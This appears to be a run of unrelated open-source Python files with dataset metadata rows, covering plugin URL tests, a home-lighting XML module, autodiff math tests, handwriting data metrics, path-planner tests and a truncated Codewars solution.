    """Verify that the BritTV plugin claims its own URLs and rejects others."""
    def test_can_handle_url(self):
        """Known BritTV watch URLs must be accepted by the plugin."""
        matching_urls = [
            'http://brittv.co.uk/watch/?channel=1',
        ]
        for candidate in matching_urls:
            self.assertTrue(BritTV.can_handle_url(candidate))
    def test_can_handle_url_negative(self):
        """Unrelated URLs must not be accepted by the plugin."""
        non_matching_urls = [
            'https://example.com/index.html',
        ]
        for candidate in non_matching_urls:
            self.assertFalse(BritTV.can_handle_url(candidate))
44161fe721c4935dde56518cd9d4e7cbde6b5a22 | 6,833 | py | Python | src/Modules/Lighting/lighting.py | bopopescu/PyHouse_1 | 6444ed0b4c38ab59b9e419e4d54d65d598e6a54e | [
"MIT"
] | 1 | 2016-09-21T19:30:21.000Z | 2016-09-21T19:30:21.000Z | src/Modules/Lighting/lighting.py | bopopescu/PyHouse_1 | 6444ed0b4c38ab59b9e419e4d54d65d598e6a54e | [
"MIT"
] | null | null | null | src/Modules/Lighting/lighting.py | bopopescu/PyHouse_1 | 6444ed0b4c38ab59b9e419e4d54d65d598e6a54e | [
"MIT"
] | 1 | 2020-07-23T11:13:36.000Z | 2020-07-23T11:13:36.000Z | """
-*- test-case-name: PyHouse.Modules.Lighting.test.test_lighting -*-
@name: PyHouse/src/Modules/Lighting/lighting.py
@author: D. Brian Kimmel
@contact: D.BrianKimmel@gmail.com
@copyright: (c) 2010-2016 by D. Brian Kimmel
@note: Created on Apr 2, 2010
@license: MIT License
@summary: Handle the home lighting system automation.
This is called from 'house'.
for every house.
PyHouse.House.Lighting.
Buttons
Controllers
Lights
"""
# Import system type stuff
import xml.etree.ElementTree as ET
# Import PyHouse files
from Modules.Core.data_objects import LightingData, ControllerData
from Modules.Families.family_utils import FamUtil
from Modules.Lighting.lighting_actions import Utility as actionUtility
from Modules.Lighting.lighting_buttons import API as buttonsAPI
from Modules.Lighting.lighting_controllers import API as controllersAPI
from Modules.Lighting.lighting_lights import API as lightsAPI
from Modules.Computer import logging_pyh as Logger
LOG = Logger.getLogger('PyHouse.Lighting ')
class Utility(object):
    """Commands we can run from high places.

    Readers return empty dicts (and log a warning) when a section is missing,
    so an incomplete config file never aborts startup.
    """
    def _setup_lighting(self, p_pyhouse_obj):
        """
        Find the lighting information
        Config file version 1.4 moved the lighting information into a separate LightingSection
        @param p_pyhouse_obj: the master PyHouse data object (holds the XML root).
        @return: the XML element containing the lighting sections; falls back to
            the HouseDivision element (or the root) for pre-1.4 config files.
        """
        l_root = p_pyhouse_obj.Xml.XmlRoot
        l_lighting_xml = None
        try:
            l_house_xml = l_root.find('HouseDivision')
        except AttributeError as e_err:
            LOG.error('House Division is missing in Config file. {}'.format(e_err))
            l_house_xml = l_root
        try:
            l_lighting_xml = l_house_xml.find('LightingSection')
        except AttributeError as e_err:
            LOG.warning('Old version of Config file found. No LightingSection {}'.format(e_err))
        # We have an old version
        if l_lighting_xml is None or l_lighting_xml == 'None':
            l_lighting_xml = l_house_xml
        return l_lighting_xml
    def _read_buttons(self, p_pyhouse_obj, p_xml):
        """Read the ButtonSection of p_xml; return {} and warn if it is absent."""
        try:
            l_xml = p_xml.find('ButtonSection')
            l_ret = buttonsAPI.read_all_buttons_xml(p_pyhouse_obj, l_xml)
        except AttributeError as e_err:
            l_ret = {}
            l_msg = 'No Buttons found {}'.format(e_err)
            LOG.warning(l_msg)
        return l_ret
    def _read_controllers(self, p_pyhouse_obj, p_xml):
        """Read the ControllerSection; return {} and warn if it is absent."""
        try:
            l_xml = p_xml.find('ControllerSection')
            # NOTE(review): l_xml is looked up but never passed to the reader
            # below -- confirm read_all_controllers_xml locates the XML itself.
            l_ret = controllersAPI.read_all_controllers_xml(p_pyhouse_obj)
        except AttributeError as e_err:
            l_ret = {}
            l_msg = 'No Controllers found {}'.format(e_err)
            LOG.warning(l_msg)
        return l_ret
    def _read_lights(self, p_pyhouse_obj, p_xml):
        """Read the LightSection of p_xml; return {} and warn if it is absent."""
        try:
            l_xml = p_xml.find('LightSection')
            l_ret = lightsAPI.read_all_lights_xml(p_pyhouse_obj, l_xml)
        except AttributeError as e_err:
            l_ret = {}
            l_msg = 'No Lights found: {}'.format(e_err)
            LOG.warning(l_msg)
        return l_ret
    def _read_lighting_xml(self, p_pyhouse_obj):
        """
        Get all the lighting components for a house
        Config file version 1.4 moved the lighting information into a separate LightingSection
        @return: the freshly built LightingData object (also stored on
            p_pyhouse_obj.House.Lighting); left empty when sections are missing.
        """
        l_xml = p_pyhouse_obj.Xml.XmlRoot
        l_lighting_xml = self._setup_lighting(p_pyhouse_obj)  # in case of old style file
        p_pyhouse_obj.House.Lighting = LightingData()
        l_xml = l_xml.find('HouseDivision')
        if l_xml is None:
            return p_pyhouse_obj.House.Lighting
        l_xml = l_xml.find('LightingSection')
        if l_xml is None:
            return p_pyhouse_obj.House.Lighting
        p_pyhouse_obj.House.Lighting.Controllers = self._read_controllers(p_pyhouse_obj, l_lighting_xml)
        p_pyhouse_obj.House.Lighting.Buttons = self._read_buttons(p_pyhouse_obj, l_lighting_xml)
        p_pyhouse_obj.House.Lighting.Lights = self._read_lights(p_pyhouse_obj, l_lighting_xml)
        # print(PrettyFormatAny.form(p_pyhouse_obj.House.Lighting, 'Lighting'))
        return p_pyhouse_obj.House.Lighting
    @staticmethod
    def _write_lighting_xml(p_pyhouse_obj, p_house_element):
        """
        Build the LightingSection element (lights, buttons, controllers).
        @param p_pyhouse_obj: is the whole PyHouse Object
        @param p_house_element: is the XML
        @return: the LightingSection element; note it is also appended to
            p_house_element before returning.
        """
        l_lighting_xml = ET.Element('LightingSection')
        try:
            l_xml = lightsAPI.write_all_lights_xml(p_pyhouse_obj)
            l_lighting_xml.append(l_xml)
            l_lighting_xml.append(buttonsAPI.write_buttons_xml(p_pyhouse_obj))
            l_lighting_xml.append(controllersAPI.write_all_controllers_xml(p_pyhouse_obj))
        except AttributeError as e_err:
            l_msg = 'ERROR-109: {}'.format(e_err)
            LOG.error(l_msg)
        p_house_element.append(l_lighting_xml)
        return l_lighting_xml
class API(Utility):
    """Public lighting API: load/save the XML config and change light levels."""
    def __init__(self, p_pyhouse_obj):
        # attach an empty LightingData so later readers always find the attribute
        p_pyhouse_obj.House.Lighting = LightingData()
        # p_pyhouse_obj.House.Lighting.Controllers = ControllerData()
        self.m_pyhouse_obj = p_pyhouse_obj
        LOG.info('Initialized')
    def LoadXml(self, p_pyhouse_obj):
        """ Load the Lighting xml info.
        """
        self._read_lighting_xml(p_pyhouse_obj)
    def SaveXml(self, p_xml):
        """ Save the Lighting section.
        It will contain several sub-sections
        NOTE(review): _write_lighting_xml already appends the section to p_xml,
        so the append below adds it a second time -- confirm this duplication
        is intended before changing it.
        """
        l_xml = Utility._write_lighting_xml(self.m_pyhouse_obj, p_xml)
        p_xml.append(l_xml)
        LOG.info("Saved Lighting XML.")
        return p_xml
    def Start(self):
        """Allow loading of sub modules and drivers.
        """
        self.m_pyhouse_obj.APIs.House.FamilyAPI.start_lighting_families(self.m_pyhouse_obj)
        LOG.info("Started.")
    def Stop(self):
        """Allow cleanup of all drivers.
        """
        LOG.info("Stopping all lighting families.")
        # self.m_pyhouse_obj.APIs.House.FamilyAPI.stop_lighting_families(self.m_pyhouse_obj)
        LOG.info("Stopped.")
    def ChangeLight(self, p_light_obj, p_source, p_new_level, _p_rate = None):
        """
        Set an Insteon controlled light to a value - On, Off, or Dimmed.
        Called by:
            web_controlLights
            schedule
        Errors from the family driver are logged rather than propagated.
        """
        l_light_obj = actionUtility._find_full_obj(self.m_pyhouse_obj, p_light_obj)
        try:
            LOG.info("Turn Light {} to level {}, DeviceFamily:{}".format(l_light_obj.Name, p_new_level, l_light_obj.DeviceFamily))
            l_api = FamUtil._get_family_device_api(self.m_pyhouse_obj, l_light_obj)
            l_api.ChangeLight(l_light_obj, p_source, p_new_level)
        except Exception as e_err:
            LOG.error('ERROR - {}'.format(e_err))
# ## END DBK
| 37.543956 | 130 | 0.657837 | 5,714 | 0.836236 | 0 | 0 | 744 | 0.108883 | 0 | 0 | 2,207 | 0.322991 |
44162499513d25160459c56fac5a7f8e586c1da1 | 2,244 | py | Python | tests/math/unary/test_hyperbolictrig.py | Zac-HD/MyGrad | fbc375d28842e1af1ebaf62ca6da479609a6baf6 | [
"MIT"
] | null | null | null | tests/math/unary/test_hyperbolictrig.py | Zac-HD/MyGrad | fbc375d28842e1af1ebaf62ca6da479609a6baf6 | [
"MIT"
] | 2 | 2017-08-02T01:47:51.000Z | 2017-08-12T22:34:50.000Z | tests/math/unary/test_hyperbolictrig.py | Zac-HD/MyGrad | fbc375d28842e1af1ebaf62ca6da479609a6baf6 | [
"MIT"
] | null | null | null | import numpy as np
from mygrad import cosh, coth, csch, sech, sinh, tanh
from tests.wrappers.uber import backprop_test_factory, fwdprop_test_factory
def _is_nonzero(x):
return np.all(np.abs(x.data) > 1e-8)
@fwdprop_test_factory(
    mygrad_func=sinh, true_func=np.sinh, index_to_bnds={0: (-10, 10)}, num_arrays=1
)
def test_sinh_fwd():
    """Forward pass: mygrad.sinh must agree with numpy.sinh on [-10, 10]."""
    pass
@backprop_test_factory(
    mygrad_func=sinh, true_func=np.sinh, index_to_bnds={0: (-10, 10)}, num_arrays=1
)
def test_sinh_backward():
    """Backprop: gradients of mygrad.sinh are checked by the factory on [-10, 10]."""
    pass
@fwdprop_test_factory(
    mygrad_func=cosh, true_func=np.cosh, index_to_bnds={0: (-10, 10)}, num_arrays=1
)
def test_cosh_fwd():
    """Forward pass: mygrad.cosh must agree with numpy.cosh on [-10, 10]."""
    pass
@backprop_test_factory(
    mygrad_func=cosh,
    true_func=np.cosh,
    index_to_bnds={0: (-10, 10)},
    atol=1e-5,
    num_arrays=1,
)
def test_cosh_backward():
    """Backprop: gradients of mygrad.cosh are checked on [-10, 10] (atol 1e-5)."""
    pass
@fwdprop_test_factory(
    mygrad_func=tanh, true_func=np.tanh, index_to_bnds={0: (-10, 10)}, num_arrays=1
)
def test_tanh_fwd():
    """Forward pass: mygrad.tanh must agree with numpy.tanh on [-10, 10]."""
    pass
@backprop_test_factory(
    mygrad_func=tanh,
    true_func=np.tanh,
    index_to_bnds={0: (-10, 10)},
    atol=1e-5,
    num_arrays=1,
)
def test_tanh_backward():
    """Backprop: gradients of mygrad.tanh are checked on [-10, 10] (atol 1e-5)."""
    pass
@fwdprop_test_factory(
    mygrad_func=csch,
    true_func=lambda x: 1 / np.sinh(x),
    # lower bound stays away from the pole of csch at 0
    index_to_bnds={0: (0.001, 10)},
    num_arrays=1,
)
def test_csch_fwd():
    """Forward pass: mygrad.csch must agree with 1/numpy.sinh on (0.001, 10)."""
    pass
@backprop_test_factory(
    mygrad_func=csch,
    true_func=lambda x: 1 / np.sinh(x),
    # lower bound stays away from the pole of csch at 0
    index_to_bnds={0: (0.001, 10)},
    num_arrays=1,
)
def test_csch_backward():
    """Backprop: gradients of mygrad.csch are checked on (0.001, 10)."""
    pass
@fwdprop_test_factory(
    mygrad_func=sech,
    true_func=lambda x: 1 / np.cosh(x),
    index_to_bnds={0: (-10, 10)},
    num_arrays=1,
)
def test_sech_fwd():
    """Forward pass: mygrad.sech must agree with 1/numpy.cosh on [-10, 10]."""
    pass
@backprop_test_factory(
    mygrad_func=sech,
    true_func=lambda x: 1 / np.cosh(x),
    index_to_bnds={0: (0.001, 10)},
    atol=1e-5,
    num_arrays=1,
)
def test_sech_backward():
    """Backprop: gradients of mygrad.sech are checked on (0.001, 10) (atol 1e-5)."""
    pass
@fwdprop_test_factory(
    mygrad_func=coth,
    true_func=lambda x: 1 / np.tanh(x),
    index_to_bnds={0: (-10, 10)},
    # coth has a pole at 0, so drawn inputs must be bounded away from zero
    assumptions=_is_nonzero,
    num_arrays=1,
)
def test_coth_fwd():
    """Forward pass: mygrad.coth must agree with 1/numpy.tanh on nonzero inputs."""
    pass
@backprop_test_factory(
    mygrad_func=coth,
    true_func=lambda x: 1 / np.tanh(x),
    index_to_bnds={0: (0.001, 10)},
    atol=1e-5,
    num_arrays=1,
)
def test_coth_backward():
    """Backprop: gradients of mygrad.coth are checked on (0.001, 10) (atol 1e-5)."""
    pass
| 18.393443 | 83 | 0.667558 | 0 | 0 | 0 | 0 | 1,995 | 0.889037 | 0 | 0 | 0 | 0 |
441676381cae9515b51fa0e630497ee23d1f197b | 16,667 | py | Python | hwrt/data_analyzation_metrics.py | MartinThoma/hwrt | 7b274fa3022292bb1215eaec99f1826f64f98a07 | [
"MIT"
] | 65 | 2015-04-08T12:11:22.000Z | 2022-02-28T23:46:53.000Z | hwrt/data_analyzation_metrics.py | MartinThoma/hwrt | 7b274fa3022292bb1215eaec99f1826f64f98a07 | [
"MIT"
] | 35 | 2015-01-05T11:56:30.000Z | 2022-03-12T00:55:38.000Z | hwrt/data_analyzation_metrics.py | MartinThoma/hwrt | 7b274fa3022292bb1215eaec99f1826f64f98a07 | [
"MIT"
] | 18 | 2015-01-19T15:57:25.000Z | 2021-02-15T20:38:32.000Z | """Data analyzation metrics
Each algorithm works on a set of handwritings. They have to be applied like
this:
>>> import hwrt.data_analyzation_metrics
>>> from hwrt.handwritten_data import HandwrittenData
>>> data_json = '[[{"time": 123, "x": 45, "y": 67}]]'
>>> a = [{'is_in_testset': 0,
... 'formula_id': "31L",
... 'handwriting': HandwrittenData(raw_data_id=2953, raw_data_json=data_json),
... 'formula_in_latex': 'A',
... 'id': "2953L"},
... {'is_in_testset': 0,
... 'formula_id': "31L",
... 'handwriting': HandwrittenData(raw_data_id=4037, raw_data_json=data_json),
... 'formula_in_latex': 'A',
... 'id': "4037L"},
... {'is_in_testset': 0,
... 'formula_id': "31L",
... 'handwriting': HandwrittenData(raw_data_id=4056, raw_data_json=data_json),
... 'formula_in_latex': 'A',
... 'id': "4056L"}]
>>> creator_metric = Creator('creator.csv')
>>> creator_metric(a)
100%
"""
# Core Library modules
import logging
import math
import os
import sys
import time
from collections import defaultdict
# Third party modules
import numpy
# Local modules
# HandwrittenData and preprocessing are needed because of pickle
from . import handwritten_data # pylint: disable=W0611
from . import preprocessing # pylint: disable=W0611
from . import utils
logger = logging.getLogger(__name__)
sys.modules["hwrt.HandwrittenData"] = handwritten_data
def get_metrics(metrics_description):
    """Instantiate the data-analyzation metric objects described by
    ``metrics_description`` (a list of dictionaries)."""
    current_module = sys.modules[__name__]
    return utils.get_objectlist(metrics_description,
                                config_key="data_analyzation_plugins",
                                module=current_module)
# Helper functions that are useful for some metrics
def prepare_file(filename):
    """Create/truncate ``filename`` inside the project's ``analyzation/`` directory.

    Parameters
    ----------
    filename : str
        Base name of the output file.

    Returns
    -------
    str
        Absolute path of the (now empty) file.
    """
    directory = os.path.join(utils.get_project_root(), "analyzation/")
    # exist_ok avoids the check-then-create race of os.path.exists + makedirs
    os.makedirs(directory, exist_ok=True)
    workfilename = os.path.join(directory, filename)
    with open(workfilename, "w"):
        pass  # Truncate the file
    return workfilename
def sort_by_formula_id(raw_datasets):
    """Group the handwritings in ``raw_datasets`` by their accepted formula id.

    Parameters
    ----------
    raw_datasets : list of dictionaries
        Each entry must carry a ``'handwriting'`` key holding a
        ``HandwrittenData`` object (which exposes ``formula_id``).

    Returns
    -------
    defaultdict
        Maps each ``formula_id`` to the list of its ``HandwrittenData``
        objects, in input order.
    """
    grouped = defaultdict(list)
    for dataset in raw_datasets:
        handwriting = dataset["handwriting"]
        grouped[handwriting.formula_id].append(handwriting)
    return grouped
# Only data analyzation calculation classes follow
# Every class must have a __str__, __repr__ and __call__ function where
# __call__ must take exactly one argument of type list of dictionaries
# Every class must have a constructor which takes the filename as a parameter.
# This filename has to be used to write the evaluation results
# (preferably in CSV format) to this file.
# prepare_file should be applied to every file in the constructor
class Creator:
    """Analyze who created most of the data.

    Writes a CSV (creatorid, nr of recordings) sorted by count, descending,
    preceded by a 'total' row.
    """
    def __init__(self, filename="creator.csv"):
        # prepare_file truncates the target and returns its absolute path
        self.filename = prepare_file(filename)
    def __repr__(self):
        return "AnalyzeCreator(%s)" % self.filename
    def __str__(self):
        return "AnalyzeCreator(%s)" % self.filename
    def __call__(self, raw_datasets):
        """Count recordings per user_id over ``raw_datasets`` and write the CSV."""
        with open(self.filename, "a") as write_file:
            write_file.write("creatorid,nr of recordings\n")  # heading
            print_data = defaultdict(int)
            start_time = time.time()
            for i, raw_dataset in enumerate(raw_datasets):
                if i % 100 == 0 and i > 0:
                    utils.print_status(len(raw_datasets), i, start_time)
                print_data[raw_dataset["handwriting"].user_id] += 1
            print("100%")
            # Sort the data by highest value, descending
            print_data = sorted(print_data.items(), key=lambda n: n[1], reverse=True)
            # Write data to file
            write_file.write(f"total,{sum(value for _, value in print_data)}\n")
            for userid, value in print_data:
                write_file.write(f"{userid},{value}\n")
class InstrokeSpeed:
    """Analyze how fast the points were in pixel/ms.

    Writes one speed value per point pair to a CSV (descending) and logs the
    mean and standard deviation.
    """
    def __init__(self, filename="instroke_speed.csv"):
        # prepare_file truncates the target and returns its absolute path
        self.filename = prepare_file(filename)
    def __repr__(self):
        return "InstrokeSpeed(%s)" % self.filename
    def __str__(self):
        return "InstrokeSpeed(%s)" % self.filename
    def __call__(self, raw_datasets):
        """Compute point-to-point speeds within each stroke of each recording."""
        with open(self.filename, "a") as write_file:
            write_file.write("speed\n")  # heading
            print_data = []
            start_time = time.time()
            for i, raw_dataset in enumerate(raw_datasets):
                if i % 100 == 0 and i > 0:
                    utils.print_status(len(raw_datasets), i, start_time)
                pointlist = raw_dataset["handwriting"].get_sorted_pointlist()
                for stroke in pointlist:
                    # consecutive point pairs within one stroke
                    for last_point, point in zip(stroke, stroke[1:]):
                        space_dist = math.hypot(
                            last_point["x"] - point["x"], last_point["y"] - point["y"]
                        )
                        time_delta = point["time"] - last_point["time"]
                        if time_delta == 0:
                            # identical timestamps: skip to avoid division by zero
                            continue
                        print_data.append(space_dist / time_delta)
            print("100%")
            # Sort the data by highest value, descending
            print_data = sorted(print_data, reverse=True)
            # Write data to file
            for value in print_data:
                write_file.write("%0.8f\n" % (value))
            logger.info("instroke speed mean: %0.8f", numpy.mean(print_data))
            logger.info("instroke speed std: %0.8f", numpy.std(print_data))
class InterStrokeDistance:
    """Analyze how much distance in px is between strokes.

    For every recording, the Euclidean distance between the last point of a
    stroke and the first point of the following stroke is collected; all
    values are written to ``self.filename``, sorted descending.
    """
    def __init__(self, filename="dist_between_strokes.csv"):
        self.filename = prepare_file(filename)
    def __repr__(self):
        return "InterStrokeDistance(%s)" % self.filename
    def __str__(self):
        return "InterStrokeDistance(%s)" % self.filename
    def __call__(self, raw_datasets):
        with open(self.filename, "a") as write_file:
            # Bugfix: the heading used to read "speed" (copy-paste from
            # InstrokeSpeed), but this column contains distances in px.
            write_file.write("distance\n")  # heading
            print_data = []
            start_time = time.time()
            for i, raw_dataset in enumerate(raw_datasets):
                if i % 100 == 0 and i > 0:
                    utils.print_status(len(raw_datasets), i, start_time)
                pointlist = raw_dataset["handwriting"].get_sorted_pointlist()
                # Pair every stroke with its successor.
                for last_stroke, stroke in zip(pointlist, pointlist[1:]):
                    point1 = last_stroke[-1]  # end of the previous stroke
                    point2 = stroke[0]        # start of the next stroke
                    space_dist = math.hypot(
                        point1["x"] - point2["x"], point1["y"] - point2["y"]
                    )
                    print_data.append(space_dist)
            print("100%")
            # Sort the data by highest value, descending
            print_data = sorted(print_data, reverse=True)
            # Write data to file
            for value in print_data:
                write_file.write("%0.8f\n" % (value))
            logger.info("dist_between_strokes mean:\t%0.8fpx", numpy.mean(print_data))
            logger.info("dist_between_strokes std: \t%0.8fpx", numpy.std(print_data))
class TimeBetweenPointsAndStrokes:
    """For each recording: Store the average time between controll points of
    one stroke / controll points of two different strokes.

    Writes one averaged value per recording to each of the two output files.
    """

    def __init__(
        self,
        filename="average_time_between_points.txt",
        filename_strokes="average_time_between_strokes.txt",
    ):
        self.filename_points = prepare_file(filename)
        self.filename_strokes = prepare_file(filename_strokes)

    def __repr__(self):
        return "TimeBetweenPointsAndStrokes({points}, {strokes})".format(
            points=self.filename_points,
            strokes=self.filename_strokes,
        )

    __str__ = __repr__

    def __call__(self, raw_datasets):
        # Use context managers so both files are closed even if processing a
        # recording raises; the previous bare open()/close() leaked handles
        # on the error path.
        with open(self.filename_points, "a") as average_between_points, \
                open(self.filename_strokes, "a") as average_between_strokes:
            start_time = time.time()
            for i, raw_dataset in enumerate(raw_datasets):
                if i % 100 == 0 and i > 0:
                    utils.print_status(len(raw_datasets), i, start_time)
                # Do the work
                times_between_points, times_between_strokes = [], []
                last_stroke_end = None
                for stroke in raw_dataset["handwriting"].get_sorted_pointlist():
                    if last_stroke_end is not None:
                        # Bugfix: the pen-up gap runs from the end of the
                        # previous stroke to the *start* of this stroke.
                        # The old code used stroke[-1]["time"] (this stroke's
                        # end), which wrongly added the stroke's own duration.
                        times_between_strokes.append(stroke[0]["time"] - last_stroke_end)
                    last_stroke_end = stroke[-1]["time"]
                    for point1, point2 in zip(stroke, stroke[1:]):
                        delta = point2["time"] - point1["time"]
                        times_between_points.append(delta)
                # The recording might only have one point
                if len(times_between_points) > 0:
                    average_between_points.write(
                        "%0.2f\n" % numpy.average(times_between_points)
                    )
                # The recording might only have one stroke
                if len(times_between_strokes) > 0:
                    average_between_strokes.write(
                        "%0.2f\n" % numpy.average(times_between_strokes)
                    )
            print("100%")
class AnalyzeErrors:
    """Analyze the number of errors in the dataset.

    Counts wild points, missing strokes and stray single dots per recording
    and writes a human-readable report to ``self.filename``.
    """
    def __init__(self, filename="errors.txt", time_max_threshold=30 * 1000):
        self.filename = prepare_file(filename)
        self.time_max_threshold = time_max_threshold # in ms
        # Symbols that legitimately contain dot-like strokes; recordings of
        # these are not counted as "single dot" errors.
        self.dot_symbols = [
            "i",
            "j",
            r"\cdot",
            r"\div",
            "\\because",
            "\\therefore",
        ] # TODO: Use the tags!
    def __repr__(self):
        return "AnalyzeErrors"
    def __str__(self):
        return "AnalyzeErrors"
    def _write_data(
        self,
        symbols,
        err_recs,
        nr_recordings,
        total_error_count,
        percentages,
        time_max_list,
    ):
        """Write all obtained data to a file.
        Parameters
        ----------
        symbols : dictionary mapping symbol (String) to its recording count
            (iterated via ``symbols.items()`` below)
        err_recs : dictionary
            count of recordings by error type
        nr_recordings : non-negative int
            number of recordings
        total_error_count : dictionary
            Count of all error that have happened by type
        percentages : list
            List of all recordings where removing the dots changed the size of
            the bounding box.
        time_max_list : list
            List of all recordings where the recording time is above a
            threshold.
        """
        write_file = open(self.filename, "a") # noqa
        # Build a comma-separated symbol overview; a line break is inserted
        # before 'a'/'0'/'A' and after 'z'/'9'/'Z' so that lower-case letters,
        # digits and upper-case letters each start on their own line.
        s = ""
        for symbol, count in sorted(symbols.items(), key=lambda n: n[0]):
            if symbol in ["a", "0", "A"]:
                s += "\n%s (%i), " % (symbol, count)
            elif symbol in ["z", "9", "Z"]:
                s += "%s (%i) \n" % (symbol, count)
            else:
                s += "%s (%i), " % (symbol, count)
        print("## Data", file=write_file)
        print("Symbols: %i" % len(symbols), file=write_file)
        print("Recordings: %i" % sum(symbols.values()), file=write_file)
        print("```", file=write_file)
        print(s[:-1], file=write_file)  # s[:-1] drops the trailing separator
        print("```", file=write_file)
        # Show errors
        print(
            "Recordings with wild points: %i (%0.2f%%)"
            % (
                err_recs["wild_points"],
                float(err_recs["wild_points"]) / nr_recordings * 100,
            ),
            file=write_file,
        )
        print("wild points: %i" % total_error_count["wild_points"], file=write_file)
        print(
            "Recordings with missing stroke: %i (%0.2f%%)"
            % (
                err_recs["missing_stroke"],
                float(err_recs["missing_stroke"]) / nr_recordings * 100,
            ),
            file=write_file,
        )
        print(
            "Recordings with errors: %i (%0.2f%%)"
            % (err_recs["total"], float(err_recs["total"]) / nr_recordings * 100),
            file=write_file,
        )
        print(
            "Recordings with dots: %i (%0.2f%%)"
            % (
                err_recs["single_dots"],
                float(err_recs["single_dots"]) / nr_recordings * 100,
            ),
            file=write_file,
        )
        print("dots: %i" % total_error_count["single_dots"], file=write_file)
        print(
            "size changing removal: %i (%0.2f%%)"
            % (len(percentages), float(len(percentages)) / nr_recordings * 100),
            file=write_file,
        )
        print(
            "%i recordings took more than %i ms. That were: "
            % (len(time_max_list), self.time_max_threshold),
            file=write_file,
        )
        for recording in time_max_list:
            print(
                "* %ims: %s: %s"
                % (
                    recording.get_time(),
                    utils.get_readable_time(recording.get_time()),
                    recording,
                ),
                file=write_file,
            )
        write_file.close()
    def __call__(self, raw_datasets):
        """Collect error statistics over ``raw_datasets`` and write the report."""
        # Initialize variables
        symbols = defaultdict(int)
        # Count errornous recordings
        err_recs = {
            "wild_points": 0,
            "missing_stroke": 0,
            "single_dots": 0, # except symbols_with_dots
            "total": 0,
        }
        # Count errors (one type of error might occur multiple times in
        # a single recording)
        total_error_count = {"wild_points": 0, "single_dots": 0}
        percentages = []
        # List with recordings that are over the time maximum
        time_max_list = []
        for raw_dataset in raw_datasets:
            recording = raw_dataset["handwriting"]
            symbols[recording.formula_in_latex] += 1
            if recording.get_time() > self.time_max_threshold:
                time_max_list.append(recording)
            if recording.wild_point_count > 0:
                err_recs["wild_points"] += 1
                total_error_count["wild_points"] += recording.wild_point_count
            err_recs["missing_stroke"] += recording.missing_stroke
            if recording.wild_point_count > 0 or recording.missing_stroke:
                err_recs["total"] += 1
            # A recording only counts as a dot error when its symbol is not
            # expected to contain dots (see self.dot_symbols).
            if (
                recording.count_single_dots() > 0
                and raw_dataset["formula_in_latex"] not in self.dot_symbols
                and "dots" not in raw_dataset["formula_in_latex"]
            ):
                err_recs["single_dots"] += 1
                # Measure how much the bounding box shrinks when the dots are
                # removed; a percentage < 1.0 means removal changed the size.
                # NOTE(review): recording.preprocessing mutates the recording
                # in place -- presumably acceptable here; confirm.
                old_area = recording.get_area()
                tmp = [preprocessing.RemoveDots()]
                recording.preprocessing(tmp)
                new_area = recording.get_area()
                percentage = float(new_area) / float(old_area)
                if percentage < 1.0:
                    percentages.append(percentage)
                total_error_count["single_dots"] += recording.count_single_dots()
        # Longest recordings first.
        time_max_list = sorted(time_max_list, key=lambda n: n.get_time(), reverse=True)
        self._write_data(
            symbols,
            err_recs,
            len(raw_datasets),
            total_error_count,
            percentages,
            time_max_list,
        )
| 35.613248 | 87 | 0.574789 | 12,845 | 0.770685 | 0 | 0 | 0 | 0 | 0 | 0 | 6,069 | 0.364133 |
44170fa4cc3dbe32cd38f39ba8ff73bae2cde9dc | 1,609 | py | Python | tests/test_spiral_spanning_tree_coverage_path_planner.py | duken72/PythonRobotics | 177f04618c4bbba40bea38cd57d642f7ab9e3725 | [
"MIT"
] | 15,431 | 2016-10-07T08:25:10.000Z | 2022-03-31T22:06:02.000Z | tests/test_spiral_spanning_tree_coverage_path_planner.py | duken72/PythonRobotics | 177f04618c4bbba40bea38cd57d642f7ab9e3725 | [
"MIT"
] | 486 | 2017-05-01T00:40:00.000Z | 2022-03-23T06:57:42.000Z | tests/test_spiral_spanning_tree_coverage_path_planner.py | duken72/PythonRobotics | 177f04618c4bbba40bea38cd57d642f7ab9e3725 | [
"MIT"
] | 4,978 | 2017-03-05T22:23:36.000Z | 2022-03-31T12:42:17.000Z | import conftest # Add root path to sys.path
import os
import matplotlib.pyplot as plt
from PathPlanning.SpiralSpanningTreeCPP \
import spiral_spanning_tree_coverage_path_planner
spiral_spanning_tree_coverage_path_planner.do_animation = True
def spiral_stc_cpp(img, start):
    """Run the spiral STC planner on *img* from *start* and assert coverage."""
    rows, cols = img.shape[0], img.shape[1]
    # Sum of all cell values (amount of free space in the map).
    num_free = sum(img[r][c] for r in range(rows) for c in range(cols))
    planner = spiral_spanning_tree_coverage_path_planner.SpiralSpanningTreeCoveragePlanner(img)
    edge, route, path = planner.plan(start)
    visited = set()
    for p, q in edge:
        visited.update((p, q))
    # assert complete coverage
    assert len(visited) == num_free / 4
def test_spiral_stc_cpp_1():
    """Plan on the first test map, starting from the origin."""
    planner_dir = os.path.dirname(os.path.abspath(__file__)) \
        + "/../PathPlanning/SpiralSpanningTreeCPP"
    img = plt.imread(os.path.join(planner_dir, 'map', 'test.png'))
    spiral_stc_cpp(img, (0, 0))
def test_spiral_stc_cpp_2():
    """Plan on the second test map, starting from row 10."""
    planner_dir = os.path.dirname(os.path.abspath(__file__)) \
        + "/../PathPlanning/SpiralSpanningTreeCPP"
    img = plt.imread(os.path.join(planner_dir, 'map', 'test_2.png'))
    spiral_stc_cpp(img, (10, 0))
def test_spiral_stc_cpp_3():
    """Plan on the third test map, starting from the origin."""
    planner_dir = os.path.dirname(os.path.abspath(__file__)) \
        + "/../PathPlanning/SpiralSpanningTreeCPP"
    img = plt.imread(os.path.join(planner_dir, 'map', 'test_3.png'))
    spiral_stc_cpp(img, (0, 0))
# Allow running this test module directly (outside the pytest runner).
if __name__ == '__main__':
    conftest.run_this_test(__file__)
| 27.271186 | 64 | 0.674332 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 232 | 0.144189 |
441aa57a53a22851224b5613923ac3dbb66e492a | 320 | py | Python | codewars-python/Build-Tower.py | fmelihh/competitive-programming-solutions | c15c2f7d90153f35f9bd9ffcea20ac921564eacf | [
"MIT"
] | 2 | 2021-09-06T22:13:12.000Z | 2021-11-22T08:50:04.000Z | codewars-python/Build-Tower.py | fmelihh/competitive-programming-solutions | c15c2f7d90153f35f9bd9ffcea20ac921564eacf | [
"MIT"
] | null | null | null | codewars-python/Build-Tower.py | fmelihh/competitive-programming-solutions | c15c2f7d90153f35f9bd9ffcea20ac921564eacf | [
"MIT"
] | null | null | null |
# https://www.codewars.com/kata/576757b1df89ecf5bd00073b/train/python
def tower_builder(n_floors):
    """Return a tower of *n_floors* strings.

    Floor ``i`` (top = 0) holds ``2*i + 1`` stars, centered within the
